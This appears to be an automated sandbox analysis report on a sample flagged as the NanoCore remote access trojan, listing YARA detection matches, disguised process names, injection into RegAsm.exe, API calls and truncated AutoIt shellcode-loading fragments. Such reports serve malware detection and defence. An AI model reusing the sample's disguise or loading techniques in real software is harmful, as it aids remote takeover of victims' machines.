        Source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 5944, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: RegAsm.exe PID: 4332, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: RegAsm.exe PID: 4332, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: d4e475d7d17a16be8b9eeac6e10b25af.exe PID: 576, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: d4e475d7d17a16be8b9eeac6e10b25af.exe PID: 576, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        AutoIt script contains suspicious stringsShow sources
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exeAutoIt Script: 1 = 38669117 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exeAutoIt Script: 792303 THEN LOCAL $LPSHELLCODE = $E ($B (ZVTZJDNXH
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.drAutoIt Script: 1 = 38669117 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.drAutoIt Script: 792303 THEN LOCAL $LPSHELLCODE = $E ($B (ZVTZJDNXH
        Binary is likely a compiled AutoIt script fileShow sources
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exe, 00000000.00000000.204952653.00000000009A5000.00000002.00020000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exe, 00000000.00000000.204952653.00000000009A5000.00000002.00020000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: This is a third-party compiled AutoIt script.2_2_003C3B4C
        Source: DiagnosticsHub.StandardCollector.Service.exe.batString found in binary or memory: This is a third-party compiled AutoIt script.
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat, 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exeString found in binary or memory: This is a third-party compiled AutoIt script.
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_00424021: CreateFileW,DeviceIoControl,CloseHandle,2_2_00424021
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_00418858 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,2_2_00418858
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_0042545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_0042545F
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003E33C72_2_003E33C7
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003CFE402_2_003CFE40
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003E24052_2_003E2405
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003D44B62_2_003D44B6
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_004406652_2_00440665
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003F267E2_2_003F267E
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003E283A2_2_003E283A
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003D68432_2_003D6843
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003F89DF2_2_003F89DF
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_00440AE22_2_00440AE2
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003F6A942_2_003F6A94
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_00428B132_2_00428B13
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003ECD612_2_003ECD61
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003F70062_2_003F7006
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003D710E2_2_003D710E
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003D31902_2_003D3190
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003C12872_2_003C1287
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003EF4192_2_003EF419
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003E16C42_2_003E16C4
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003E1BB82_2_003E1BB8
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003F9D052_2_003F9D05
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003EBFE62_2_003EBFE6
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003E1FD02_2_003E1FD0
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 3_2_02FA2FA83_2_02FA2FA8
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 3_2_02FA23A03_2_02FA23A0
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 3_2_02FA38503_2_02FA3850
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 3_2_02FA306F3_2_02FA306F
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: String function: 003C7F41 appears 35 times
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: String function: 003E8B40 appears 42 times
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: String function: 003E0D27 appears 70 times
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: sfc.dllJump to behavior
        Source: 00000002.00000003.255242846.0000000000FA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000002.00000003.255242846.0000000000FA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.211542928.00000000038E2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.211542928.00000000038E2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.209839006.00000000010BD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.209839006.00000000010BD000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000003.00000002.249609796.0000000000402000.00000020.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000003.00000002.249609796.0000000000402000.00000020.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000002.00000003.254683276.0000000001181000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000002.00000003.254683276.0000000001181000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.209991404.00000000010E7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.209991404.00000000010E7000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.209808084.0000000001147000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.209808084.0000000001147000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.209532145.0000000001114000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.209532145.0000000001114000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000002.00000003.231856687.000000000112F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000002.00000003.231856687.000000000112F000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000002.00000003.230915051.0000000001129000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000002.00000003.230915051.0000000001129000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000002.00000003.231281467.0000000001180000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000002.00000003.231281467.0000000001180000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000002.00000003.230856862.00000000011B4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000002.00000003.230856862.00000000011B4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000002.00000003.254526561.00000000011E6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000002.00000003.254526561.00000000011E6000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000002.00000003.254613953.00000000011B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000002.00000003.254613953.00000000011B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000002.00000003.254797061.0000000000F9F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000002.00000003.254797061.0000000000F9F000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000002.00000003.231188805.0000000001154000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000002.00000003.231188805.0000000001154000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000003.00000002.250629843.0000000004451000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.210637735.000000000106B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.210637735.000000000106B000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000002.00000003.232736755.0000000000E62000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000002.00000003.232736755.0000000000E62000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000002.00000003.231305365.0000000001181000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000002.00000003.231305365.0000000001181000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000002.00000003.231549555.00000000010FD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000002.00000003.231549555.00000000010FD000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000003.00000002.250595233.0000000003451000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.210116902.00000000010E7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.210116902.00000000010E7000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.210229940.0000000001114000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.210229940.0000000001114000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000002.00000003.231711637.00000000010FD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000002.00000003.231711637.00000000010FD000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 5944, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 5944, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: RegAsm.exe PID: 4332, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: RegAsm.exe PID: 4332, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: d4e475d7d17a16be8b9eeac6e10b25af.exe PID: 576, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
